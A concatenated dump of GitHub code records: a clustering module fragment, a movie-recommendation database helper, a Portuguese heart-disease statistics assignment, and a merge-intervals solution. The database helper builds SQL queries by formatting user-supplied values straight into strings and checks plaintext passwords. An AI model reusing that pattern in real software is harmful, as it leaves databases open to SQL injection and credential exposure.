cluster_idx, assignments=None):\n \"\"\" Update clusters centers on a batch of data\n\n Args:\n X (torch.tensor): All the data points that were assigned to this cluster\n cluster_idx (int): The cluster index\n assignments: The probability of each cluster to be assigned to this cluster (would be a vector of ones for hard assignment)\n \"\"\"\n n_samples = X.shape[0]\n for i in range(n_samples):\n if assignments[i, cluster_idx].item() > 0:\n self.count[cluster_idx] += assignments[i, cluster_idx].item()\n eta = 1.0 / self.count[cluster_idx]\n updated_cluster = (1 - eta) * self.clusters[cluster_idx] + eta * X[i] * assignments[i, cluster_idx].item()\n # updated_cluster = (1 - eta) * self.clusters[cluster_idx] + eta * X[i]\n self.clusters[cluster_idx] = updated_cluster\n\n def update_cluster_covs(self, X, cluster_idx, assignments):\n return None\n\n def update_cluster_pis(self, X, cluster_idx, assignments):\n return None\n\n def update_assign(self, X, how_to_assign=\"min_dist\"):\n \"\"\" Assign samples in `X` to clusters \"\"\"\n if how_to_assign == \"min_dist\":\n return self._update_assign_min_dist(X.detach().cpu().numpy())\n elif how_to_assign == \"forward_pass\":\n return self.get_model_resp(X)\n\n def _update_assign_min_dist(self, X):\n dis_mat = self._compute_dist(X)\n hard_assign = np.argmin(dis_mat, axis=1)\n return self._to_one_hot(torch.tensor(hard_assign))\n\n def _to_one_hot(self, hard_assignments):\n \"\"\"\n Takes LongTensor with index values of shape (*) and\n returns a tensor of shape (*, num_classes) that have zeros everywhere\n except where the index of last dimension matches the corresponding value\n of the input tensor, in which case it will be 1.\n \"\"\"\n return torch.nn.functional.one_hot(hard_assignments, num_classes=self.n_clusters)\n\n def _set_K(self, new_K):\n self.n_clusters = new_K\n self.count = 100 * np.ones((self.n_clusters)) # serve as learning rate, pseudo-counts\n\n def get_model_params(self):\n mu, covs, pi, K = self.model.get_clusters_centers(), self.model.get_clusters_covs(), self.model.get_clusters_pis(), self.n_clusters\n return mu, covs, pi, K\n\n def get_model_resp(self, codes):\n self.model.cluster_model.to(device=self.device)\n if self.args.regularization == \"cluster_loss\":\n # cluster assignment should have grad\n return self.model.cluster_model(codes)\n else:\n # cluster assignment shouldn't have grad\n with torch.no_grad():\n return self.model.cluster_model(codes)\n", "repo_name": "BGU-CS-VIL/DeepDPM", "sub_path": "src/clustering_models/clusternet.py", "file_name": "clusternet.py", "file_ext": "py", "file_size_in_byte": 5555, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 724, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 27, "usage_type": "attribute"}, {"api_name": "joblib.Parallel", "line_number": 30, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 34, "usage_type": "call"}, {"api_name": "src.clustering_models.clusternet_modules.clusternet_trainer.ClusterNetTrainer", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "1590291715", "text": "import pymysql\r\nimport predict as rc\r\nfrom geventwebsocket.websocket import WebSocket,WebSocketError\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nimport databaseInfo as db\r\nimport datetime\r\nimport re\r\nimport json\r\n#开启10个进程\r\nexecutor = ThreadPoolExecutor(10)\r\n#过滤\\n\r\npattern_for_types = re.compile(r'')\r\n#类型集合\r\ntypes_in_database = ['Animation',\\\r\n 'Children s', \\\r\n 'Comedy\\n',\\\r\n 'Adventure',\\\r\n 'Fantasy\\n',\\\r\n 'Comedy',\\\r\n 'Romance\\n',\\\r\n 'Drama\\n',\\\r\n 'Action',\\\r\n 'Crime',\\\r\n 'Thriller\\n',\\\r\n 'Children s\\n',\\\r\n 'Action\\n',\\\r\n 'Drama',\\\r\n 'Horror\\n',\\\r\n 'Sci-Fi\\n',\\\r\n 'Documentary\\n',\\\r\n 'War\\n',\\\r\n 'Adventure\\n',\\\r\n 'Musical',\\\r\n 'Mystery\\n',\\\r\n 'Sci-Fi',\\\r\n 'Horror',\\\r\n 'Musical\\n',\\\r\n 'Crime\\n',\\\r\n 'Mystery',\\\r\n 'Romance',\\\r\n 'Thriller',\\\r\n 'Film-Noir',\\\r\n 'Western\\n',\\\r\n 'Fantasy',\\\r\n 'War',\\\r\n 'Documentary',\\\r\n 'Animation\\n',\\\r\n 'Film-Noir\\n']\r\n\r\ntypes_modified_in_database = ['Animation',\\\r\n 'Children', \\\r\n 'Comedy',\\\r\n 'Adventure',\\\r\n 'Fantasy',\\\r\n 'Comedy',\\\r\n 'Romance',\\\r\n 'Drama',\\\r\n 'Action',\\\r\n 'Crime',\\\r\n 'Thriller',\\\r\n 'Children',\\\r\n 'Action',\\\r\n 'Drama',\\\r\n 'Horror',\\\r\n 'Sci-Fi',\\\r\n 'Documentary',\\\r\n 'War',\\\r\n 'Adventure',\\\r\n 'Musical',\\\r\n 'Mystery',\\\r\n 'Sci-Fi',\\\r\n 'Horror',\\\r\n 'Musical',\\\r\n 'Crime',\\\r\n 'Mystery',\\\r\n 'Romance',\\\r\n 'Thriller',\\\r\n 'Film-Noir',\\\r\n 'Western',\\\r\n 'Fantasy',\\\r\n 'War',\\\r\n 'Documentary',\\\r\n 'Animation',\\\r\n 'Film-Noir']\r\nreverse_types_in_database = {}\r\ntypes_in_database_to_types = {}\r\nfor index in range(len(types_in_database)):\r\n reverse_types_in_database[types_modified_in_database[index]] = types_in_database[index]\r\n types_in_database_to_types[types_in_database[index]] = types_modified_in_database[index]\r\n#服务函数\r\n#注册添加信息\r\n\r\ndef add_userInfo(userInfo):\r\n #加入数据库\r\n conn = pymysql.connect(host=db.databaseAddress, user=db.databaseLoginName, password=db.databasePasswd, database=db.databaseName)\r\n cur = conn.cursor()\r\n #gender必须是‘男’或‘女’\r\n sql1 = \"Insert INTO User VALUES({},'{}',{},{},'{}','{}') \".format(\\\r\n userInfo[0],userInfo[1],userInfo[2],\\\r\n userInfo[3],userInfo[4],userInfo[5])\r\n sql2 = \"CREATE OR REPLACE VIEW rates AS SELECT MovieID, AVG(Rating) as rating FROM review GROUP BY MovieID\"\r\n try:\r\n print(sql1)\r\n cur.execute(sql1)\r\n print('test1')\r\n print(sql2)\r\n cur.execute(sql2)\r\n print('test2')\r\n for type in userInfo[6]:\r\n original_type = reverse_types_in_database[type]\r\n sql3 = \"CREATE OR REPLACE VIEW movie_{} as SELECT MovieID from movie_genre WHERE genre = '{}'\".format(type,original_type)\r\n cur.execute(sql3)\r\n print('test3')\r\n sql4 = \"SELECT MovieID from movie_{} natural left join rates ORDER BY rating DESC\".format(type)\r\n cur.execute(sql4)\r\n print('test4')\r\n data = cur.fetchone()\r\n date = str(datetime.datetime.now().strftime('%Y-%m-%d'))\r\n sql5 = \"INSERT INTO watch_history VALUES({},{},'{}')\".format(userInfo[0],data[0],date)\r\n print(sql5)\r\n cur.execute(sql5)\r\n print('test5')\r\n print('test6')\r\n except Exception:\r\n conn.rollback()\r\n print('添加数据失败')\r\n return 'failed'\r\n else:\r\n conn.commit()\r\n cur.close()\r\n conn.close()\r\n return 'success'\r\n\r\n#验证用户是否存在/用户密码是否正确\r\ndef validate_userInfo(userInfo):\r\n #从数据库中按照userInfo[0]取出对应passwd\r\n conn = pymysql.connect(host=db.databaseAddress, user=db.databaseLoginName, password=db.databasePasswd, database=db.databaseName)\r\n cur = conn.cursor()\r\n sql = \"SELECT password FROM User where UserID = {}\".format(userInfo[0])\r\n cur.execute(sql)\r\n data = cur.fetchone()\r\n print('data:',data)\r\n if data == None:\r\n #数据库中没这个人\r\n return 'Not exist'\r\n if userInfo[1] == data[0]:\r\n cur.close()\r\n conn.close()\r\n return 'success'\r\n else:\r\n cur.close()\r\n conn.close()\r\n return 'fail'\r\n\r\n\r\n#根据用户id获得片单\r\ndef get_list_from_dataset(socket,userName):\r\n userName = int(userName)\r\n movies = rc.recommend_your_favorite_movie(userName, top_k=60)\r\n conn = pymysql.connect(host=db.databaseAddress, user=db.databaseLoginName, password=db.databasePasswd, database=db.databaseName)\r\n cur = conn.cursor()\r\n result = []\r\n sql1 = \"CREATE OR REPLACE VIEW rates AS SELECT MovieID, AVG(Rating) as rating FROM review GROUP BY MovieID\"\r\n #try:\r\n cur.execute(sql1)\r\n for movieID in movies:\r\n try:\r\n print(movieID)\r\n sql2 = \"SELECT Title, case when rating is null then 0 else rating END FROM movie natural left join rates WHERE movieID = {} \".format(movieID)\r\n cur.execute(sql2)\r\n data1 = cur.fetchone()\r\n print(data1)\r\n sql3 = \"SELECT case when Genre is null then 'Comedy\\n' else Genre END FROM movie natural join movie_genre natural left join rates WHERE movieID = {} \".format(movieID)\r\n cur.execute(sql3)\r\n data2 = cur.fetchall()\r\n print(data2)\r\n data2 = [i[0] for i in data2]\r\n if data1[0] != None and data1[1] != None and data2:\r\n #这里的data2改成,分隔的字符串!\r\n temp_str = types_in_database_to_types[data2[0]]\r\n for index in range(1,len(data2)):\r\n temp_str = temp_str + ',' + types_in_database_to_types[data2[index]]\r\n result.append({\"title\":data1[0],\"genre\":temp_str,\"rate\":float(data1[1])})\r\n except Exception:\r\n pass\r\n #except Exception:\r\n # conn.rollback()\r\n # print('添加数据失败')\r\n else:\r\n conn.commit()\r\n cur.close()\r\n try:\r\n conn.close()\r\n except Exception:\r\n pass\r\n try:\r\n if result:\r\n string = json.dumps(result)\r\n socket.send(string)\r\n else:\r\n socket.send('nothing')\r\n except WebSocketError:\r\n pass #占位置的空操作\r\n #executor.submit(add_to_history,userName,movies)\r\n add_to_history(userName,movies)\r\n\r\n\r\n '''\r\n #先根据userName查找出以往的历史\r\n if '有历史':\r\n #按照历史获得推荐\r\n return 'recommend content'\r\n else:\r\n #按照没有历史获得推荐\r\n return 'recommend content'\r\n '''\r\n\r\ndef add_to_history(userName,movies):\r\n conn = pymysql.connect(host=db.databaseAddress, user=db.databaseLoginName, password=db.databasePasswd, database=db.databaseName)\r\n cur = conn.cursor()\r\n date = str(datetime.datetime.now().strftime('%Y-%m-%d'))\r\n for movie in movies:\r\n sql = \"INSERT INTO watch_history VALUES({},{},'{}')\".format(userName,movie,date)\r\n cur.execute(sql)\r\n \r\n\r\n#已被废弃\r\n#def get_list_from_dataset_with_query(userName,query):\r\n'''\r\n#先根据userName查找出以往的历史\r\nif '有历史':\r\n #按照历史、query获得推荐\r\n #开一个线程,把这次的搜索加到历史中\r\n return 'recommend content'\r\nelse:\r\n #按照没有历史、只有query获得推��\r\n #开一个线程,把这次的搜索加到历史中\r\n return 'recommend content'\r\n'''", "repo_name": "GodXuxilie/DatabaseSystem", "sub_path": "supportFunction.py", "file_name": "supportFunction.py", "file_ext": "py", "file_size_in_byte": 7525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 10, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 95, "usage_type": "call"}, {"api_name": "databaseInfo.databaseAddress", "line_number": 95, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseLoginName", "line_number": 95, "usage_type": "attribute"}, {"api_name": "databaseInfo.databasePasswd", "line_number": 95, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseName", "line_number": 95, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 118, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 137, "usage_type": "call"}, {"api_name": "databaseInfo.databaseAddress", "line_number": 137, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseLoginName", "line_number": 137, "usage_type": "attribute"}, {"api_name": "databaseInfo.databasePasswd", "line_number": 137, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseName", "line_number": 137, "usage_type": "attribute"}, {"api_name": "predict.recommend_your_favorite_movie", "line_number": 159, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 160, "usage_type": "call"}, {"api_name": "databaseInfo.databaseAddress", "line_number": 160, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseLoginName", "line_number": 160, "usage_type": "attribute"}, {"api_name": "databaseInfo.databasePasswd", "line_number": 160, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseName", "line_number": 160, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 198, "usage_type": "call"}, {"api_name": "geventwebsocket.websocket.WebSocketError", "line_number": 202, "usage_type": "name"}, {"api_name": "pymysql.connect", "line_number": 219, "usage_type": "call"}, {"api_name": "databaseInfo.databaseAddress", "line_number": 219, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseLoginName", "line_number": 219, "usage_type": "attribute"}, {"api_name": "databaseInfo.databasePasswd", "line_number": 219, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseName", "line_number": 219, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 221, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 221, "usage_type": "attribute"}]} +{"seq_id": "8395870486", "text": "import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# TPC1: Análise de dados: doença cardíaca\n# Descarregue o ficheiro de dados: myheart.csv \n# Crie um programa em Python, conjunto de funções, que responda às seguintes questões:\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 1)\n# Crie uma função que lê a informação do ficheiro para um modelo, previamente pensado em memória;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\nclass Dados:\n\n def __init__(self, pessoas, max_idade, min_colesterol, max_colesterol, total_doenca, total_n_doenca, total):\n self.pessoas = pessoas # lista das pessoas, com os seus respetivos dados\n self.max_idade = max_idade\n self.min_colesterol = min_colesterol\n self.max_colesterol = max_colesterol\n self.total_doenca = total_doenca\n self.total_n_doenca = total_n_doenca\n self.total = total\n\nclass Pessoa:\n\n def __init__(self, idade, sexo, colesterol, temDoenca):\n self.idade = idade\n self.sexo = sexo\n self.colesterol = colesterol\n self.temDoenca = temDoenca\n\ndef read_myheart(): # Devolve lista dos dados das pessoas\n listaPessoas = [] # lista dos dados das pessoas\n\n min_idade = math.inf\n max_idade = 0 # var auxiliar para calcular o limite superior das idades\n min_colesterol = math.inf\n max_colesterol = 0 # calcular lims inf e sup das tensões\n total_doenca = 0\n total_n_doenca = 0\n total = 0\n\n f = open(\"myheart.csv\",'r')\n \n # Ignorar 1ª linha\n linha1 = f.readline()\n\n # Parsing do conteúdo\n linhas = f.readlines()\n for linha in linhas:\n valores = linha.split('\\n')[0].split(',')\n\n colesterol = int(valores[3])\n # eliminar valores que não fazem sentido (colesterol = 0)\n if colesterol > 0: \n idade = int(valores[0])\n temDoenca = int(valores[5])\n pessoa = Pessoa(idade, valores[1], colesterol, temDoenca)\n listaPessoas.append(pessoa)\n total += 1\n\n # Conjunto de verificações\n #idade\n if idade > max_idade: max_idade = idade\n #colesterol\n if colesterol < min_colesterol: min_colesterol = colesterol\n elif colesterol > max_colesterol: max_colesterol = colesterol\n # doenca\n if temDoenca == 1: total_doenca += 1\n else: total_n_doenca += 1\n\n # Fechar ficheiro\n f.close()\n\n dados = Dados(listaPessoas, max_idade, min_colesterol, max_colesterol, total_doenca, total_n_doenca, total)\n return dados\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 2)\n# Pense num modelo para guardar uma distribuição;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\n# exemplo: | Tem Doenca | Sem Doenca | Total\n # (...)\n # Total | | | \n\nclass DistribuicaoClasses: # semelhante a um histograma (valores contínuos)\n\n def __init__(self, titulo, var):\n self.titulo = titulo\n self.var = var # variável que se quer relacionar com a doença\n self.classes = {} # imitar hash-table (com as várias classes contínuas criadas)\n self.total = 0\n self.total_doenca = 0\n self.total_n_doenca = 0\n\n def adicionar_classe(self, l_inf, l_sup):\n self.classes[(l_inf,l_sup)] = Classe(l_inf, l_sup)\n\n def aumenta_doenca(self, l_inf, l_sup):\n self.classes[(l_inf,l_sup)].aumenta_doenca()\n self.total_doenca += 1\n self.total += 1\n \n def aumenta_n_doenca(self, l_inf, l_sup):\n self.classes[(l_inf,l_sup)].aumenta_n_doenca()\n self.total_n_doenca += 1\n self.total += 1\n\n def dividir_valores(self):\n keys = self.classes.keys()\n for key in keys:\n classe = self.classes[key]\n classe.dividir_valores(self.total)\n self.classes[key] = classe\n\nclass Classe: # para classes contínuas (idade - escalões etários)\n\n def __init__(self, l_inf, l_sup):\n self.l_inf = l_inf # limite INFERIOR\n self.l_sup = l_sup # limite SUPERIOR\n # por agora, o valor que vai estar na tabela\n self.valor = [0,0,0]\n\n def aumenta_doenca(self):\n self.valor[0] += 1 # doença\n self.valor[2] += 1 # total\n \n def aumenta_n_doenca(self):\n self.valor[1] += 1 # sem doença\n self.valor[2] += 1 # total - linhas\n\n def dividir_valores(self, total):\n for i in range(0,3):\n self.valor[i] = self.valor[i] * 100 / total\n\nclass DistribuicaoSimples: # sem classes (sexo-doença)\n\n def __init__(self, titulo, var):\n self.titulo = titulo\n self.var = var # variável que se quer relacionar com a doença\n self.tabela = {}\n\n def adicionar_chave(self, chave):\n self.tabela[chave] = [0,0,0] # doença, sem doença, total-linha\n\n def aumenta_doenca(self,chave):\n (valor_d, valor_n_d, total_linha) = self.tabela[chave]\n valor_d += 1\n total_linha += 1\n self.tabela[chave] = (valor_d, valor_n_d, total_linha)\n \n def aumenta_n_doenca(self,chave):\n (valor_d, valor_n_d, total_linha) = self.tabela[chave]\n valor_n_d += 1\n total_linha += 1\n self.tabela[chave] = (valor_d, valor_n_d, total_linha)\n\n def dividir_valores(self, total):\n keys = self.tabela.keys()\n for key in keys:\n (v1, v2, v3) = self.tabela[key]\n self.tabela[key] = (v1 * 100 / total, v2 * 100 / total, v3 * 100 / total)\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 3)\n# Crie uma função que calcula a distribuição da doença por sexo;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef dist_doenca_sexo(dados):\n dist = DistribuicaoSimples(\"-| Distribuição da doença por sexo (em percentagem, %) |-\",\"Sexo\")\n dist.adicionar_chave(\"Masculino\")\n dist.adicionar_chave(\"Feminino\")\n\n pessoas = dados.pessoas\n for pessoa in pessoas:\n if pessoa.sexo == \"M\":\n if pessoa.temDoenca == 1:\n dist.aumenta_doenca(\"Masculino\")\n else:\n dist.aumenta_n_doenca(\"Masculino\")\n else:\n if pessoa.temDoenca == 1:\n dist.aumenta_doenca(\"Feminino\")\n else:\n dist.aumenta_n_doenca(\"Feminino\")\n \n dist.dividir_valores(dados.total)\n\n return dist\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 4)\n# Crie uma função que calcula a distribuição da doença por escalões etários. Considere os seguintes escalões: [30-34], [35-39], [40-44], ...\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef dist_doenca_etario(dados):\n # Tal como pedido no enunciado, só serão aceites idades a partir dos 30 anos\n lim_inf = 30 # diferença = 5\n max_idade = dados.max_idade\n\n dist = DistribuicaoClasses(\"-| Distribuição da doença por escalões etários (em percentagem, %) |-\", \"Idade\")\n \n # Criar as várias classes (mas, sem preencher com os seus valores)\n while lim_inf <= max_idade :\n dist.adicionar_classe(lim_inf, lim_inf+4)\n #print(lim_inf)\n lim_inf += 5\n \n pessoas = dados.pessoas\n for pessoa in pessoas:\n idade = pessoa.idade\n if idade >= 30: # Tal como pedido no enunciado, só serão aceites idades a partir dos 30 anos\n ultimo_digito = idade % 5\n lim_inf = idade - ultimo_digito\n\n if pessoa.temDoenca == 1: \n dist.aumenta_doenca(lim_inf, lim_inf + 4)\n else:\n dist.aumenta_n_doenca(lim_inf, lim_inf + 4)\n \n # Calcular percentagem para cada classe\n dist.dividir_valores()\n\n return dist\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 5)\n# Crie uma função que calcula a distribuição da doença por níveis de colesterol. \n# Considere um nível igual a um intervalo de 10 unidades, comece no limite inferior e crie os níveis necessários até abranger o limite superior;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef dist_doenca_colesterol(dados):\n lim_inf = dados.min_colesterol - (dados.min_colesterol % 10) # diferença = 10\n max_colesterol = dados.max_colesterol\n\n dist = DistribuicaoClasses(\"-| Distribuição da doença por níveis de colesterol (em percentagem, %) |-\", \"Colesterol\")\n \n # Criar as várias classes (mas, sem preencher com os seus valores)\n while lim_inf <= max_colesterol :\n dist.adicionar_classe(lim_inf, lim_inf+9)\n #print(lim_inf)\n lim_inf += 10\n \n pessoas = dados.pessoas\n for pessoa in pessoas:\n colesterol = pessoa.colesterol\n ultimo_digito = colesterol % 10\n lim_inf = colesterol - ultimo_digito\n \n if pessoa.temDoenca == 1: \n dist.aumenta_doenca(lim_inf, lim_inf+9)\n else:\n dist.aumenta_n_doenca(lim_inf, lim_inf+9)\n \n dist.dividir_valores()\n\n return dist\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 6)\n# Crie uma função que imprime na forma de uma tabela uma distribuição;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef imprimir_distribuicao(dist, dados): # sob forma de tabela\n print(\"\")\n print(dist.titulo)\n print(\"\")\n print(dist.var + \" | Tem Doenca | Sem Doenca | Total\")\n print(\"----------------------------------------------\")\n\n if isinstance(dist, DistribuicaoClasses):\n keys = dist.classes.keys()\n for key in keys:\n classe = dist.classes[key]\n print(\"[\" + str(classe.l_inf) + \", \" + str(classe.l_sup) + \"] | \" + str(classe.valor[0]) + \" % | \" + str(classe.valor[1]) + \" % | \" + str(classe.valor[2]) + \" %\")\n print(\"Total | \" + str(dist.total_doenca * 100 / dist.total) + \" % | \" + str(dist.total_n_doenca * 100 / dist.total) + \" % | \" + str(dist.total * 100 / dist.total) + \" %\\n\")\n\n elif isinstance(dist, DistribuicaoSimples):\n keys = dist.tabela.keys()\n for key in keys:\n valor = dist.tabela[key]\n print(key + \" | \" + str(valor[0]) + \" % | \" + str(valor[1]) + \" % | \" + str(valor[2]) + \" %\")\n print(\"Total | \" + str(dados.total_doenca * 100 / dados.total) + \" % | \" + str(dados.total_n_doenca * 100 / dados.total) + \" % | \" + str(dados.total * 100 / dados.total) + \" %\\n\")\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 7)\n# Especifique um programa que ao executar apresenta as tabelas correspondentes às distribuições pedidas;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef main():\n\n print(\"\\nTPC1 - Processamento de Linguagens - 2023\")\n print(\"Guilherme Martins - a92847 - LEI\")\n\n dados = read_myheart() # dados do csv\n #print(\"Parsing dos dados concluído\\n\")\n \n dist_sexo = dist_doenca_sexo(dados)\n dist_etario = dist_doenca_etario(dados)\n dist_colesterol = dist_doenca_colesterol(dados)\n #print(\"Cálculo das distribuições concluído\\n\")\n\n sair = 1\n\n # Interface do programa\n while sair :\n\n print(\"\\n--------------------\")\n print(\"| Opcoes possíveis |\")\n print(\"--------------------\\n\")\n print(\"1 - Distribuição da doença por sexo\")\n print(\"2 - Distribuição da doença por escalões etários\")\n print(\"3 - Distribuição da doença por níveis de colesterol\")\n print(\"4 - (matplotlib) Distribuição da doença por sexo\")\n print(\"5 - (matplotlib) Distribuição da doença por escalões etários\")\n print(\"6 - (matplotlib) Distribuição da doença por níveis de colesterol\")\n print(\"0 - Sair\")\n opcao = int(input(\"\\nEscreva a opção desejada: \"))\n \n # 1 - Distribuição da doença por sexo\n if opcao == 1:\n imprimir_distribuicao(dist_sexo, dados)\n # 2 - Distribuição da doença por escalões etários\n elif opcao == 2:\n imprimir_distribuicao(dist_etario, dados)\n # 3 - Distribuição da doença por níveis de colesterol\n elif opcao == 3:\n imprimir_distribuicao(dist_colesterol, dados)\n # 4 - (matplotlib) Distribuição da doença por sexo\n elif opcao == 4:\n graficos_dists(dist_sexo, dados)\n # 5 - (matplotlib) Distribuição da doença por escalões etários\n elif opcao == 5:\n graficos_dists(dist_etario, dados)\n # 6 - (matplotlib) Distribuição da doença por níveis de colesterol\n elif opcao == 6:\n graficos_dists(dist_colesterol, dados)\n # 0 - Sair\n elif opcao == 0: \n sair = 0\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 8)\n# Extra: explore o módulo matplotlib e crie gráficos para as suas distribuições.\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef graficos_dists(dist, dados):\n\n # https://matplotlib.org/stable/gallery/lines_bars_and_markers/barchart.html#sphx-glr-gallery-lines-bars-and-markers-barchart-py\n classes = []\n colunas = {\"Tem Doença\": (), \"Sem Doença\": (), \"Total\": ()}\n\n if isinstance(dist, DistribuicaoClasses):\n keys = dist.classes.keys()\n # temos de criar a string das chaves\n for (v1,v2) in keys:\n classe = dist.classes[(v1,v2)]\n classes.append(\"[\" + str(v1) + \", \" + str(v2) +\"]\")\n valor = classe.valor\n colunas[\"Tem Doença\"] = colunas[\"Tem Doença\"] +(valor[0],)\n colunas[\"Sem Doença\"] = colunas[\"Sem Doença\"] +(valor[1],)\n colunas[\"Total\"] = colunas[\"Total\"] +(valor[2],)\n elif isinstance(dist, DistribuicaoSimples):\n classes = list(dist.tabela.keys())\n for key in classes:\n # dist.tabela[key]\n colunas[\"Tem Doença\"] = colunas[\"Tem Doença\"] +(dist.tabela[key][0],)\n colunas[\"Sem Doença\"] = colunas[\"Sem Doença\"] +(dist.tabela[key][1],)\n colunas[\"Total\"] = colunas[\"Total\"] +(dist.tabela[key][2],)\n\n x = np.arange(len(classes)) # the label locations\n width = 0.25 # the width of the bars\n multiplier = 0\n\n fig, ax = plt.subplots(constrained_layout=True)\n\n for attribute, measurement in colunas.items():\n offset = width * multiplier\n rects = ax.bar(x + offset, measurement, width, label=attribute)\n ax.bar_label(rects, padding=3)\n multiplier += 1\n\n # Add some text for labels, title and custom x-axis tick labels, etc.\n ax.set_ylabel('Percentagem (%)')\n ax.set_title(dist.titulo)\n ax.set_xticks(x + width, classes)\n ax.legend(loc='upper left', ncols=3)\n if isinstance(dist, DistribuicaoClasses): \n if dist.var == \"Idade\": ax.set_ylim(0, 25)\n elif dist.var == \"Colesterol\": ax.set_ylim(0, 10)\n elif isinstance(dist, DistribuicaoSimples): ax.set_ylim(0, 85)\n\n plt.show()\n\nif __name__ == '__main__':\n main()", "repo_name": "GuiSSMartins/PL2023", "sub_path": "TPC1/tpc1.py", "file_name": "tpc1.py", "file_ext": "py", "file_size_in_byte": 16727, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.inf", "line_number": 39, "usage_type": "attribute"}, {"api_name": "math.inf", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 394, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 394, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 412, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 412, "usage_type": "name"}]} +{"seq_id": "17488266856", "text": "from typing import List\n#create an array for all times. Mark as 1 if it is an interval. In the end, count groups of 1's and return interval\nclass Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n #sl = sorted(intervals,key=lambda x : x[0])\n mn = intervals[0][0]\n mx = intervals[0][1]\n for i in intervals :\n if i[0] < mn :\n mn = i[0]\n if i[1] > mx :\n mx = i[1]\n #print(mn,mx)\n n = mx-mn + 1\n result = []\n l = [0 for i in range(mx+1)]\n for i in intervals :\n start = i[0]\n end = i[1]\n if start == end :\n if l[start] == 1 :\n continue\n else :\n l[start] = 0.5\n # print(start,end)\n for j in range(start,end) :\n l[j]=1\n index = 0\n s = -1\n print (l)\n for i in range(len(l)) :\n if l[i] == 1 and s==-1 :\n s = i\n if l[i] == 0 and s!=-1 :\n result.append([s,i])\n s = -1\n if i == len(l)-1 :\n if l[i] == 1 and s!=-1 :\n result.append([s,i])\n if l[i] == 1 and s == -1 :\n result.append([i,i])\n \n if l[i] == 0.5 and s==-1:\n result.append([i,i])\n if l[i] ==0.5 and s!=-1 :\n result.append([s,i])\n s = -1\n\n return result \n \n\"\"\"\nthis solution involves sorting the input array :\n\nclass Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n intervals.sort()\n result=[]\n for interval in intervals:\n first =interval[0]\n second=interval[1]\n if len(result)== 0 :\n result.append(interval)\n elif result[-1][0] == first:\n result.pop(-1)\n result.append(interval)\n elif first <= result[-1][1]:\n first = result[-1][0]\n second= max(second,result[-1][1])\n result.pop(-1)\n result.append([first,second])\n else:\n result.append(interval)\n return result\n\"\"\" \n ", "repo_name": "shauryasoni/Leetcode", "sub_path": "mergeIntervals.py", "file_name": "mergeIntervals.py", "file_ext": "py", "file_size_in_byte": 2335, 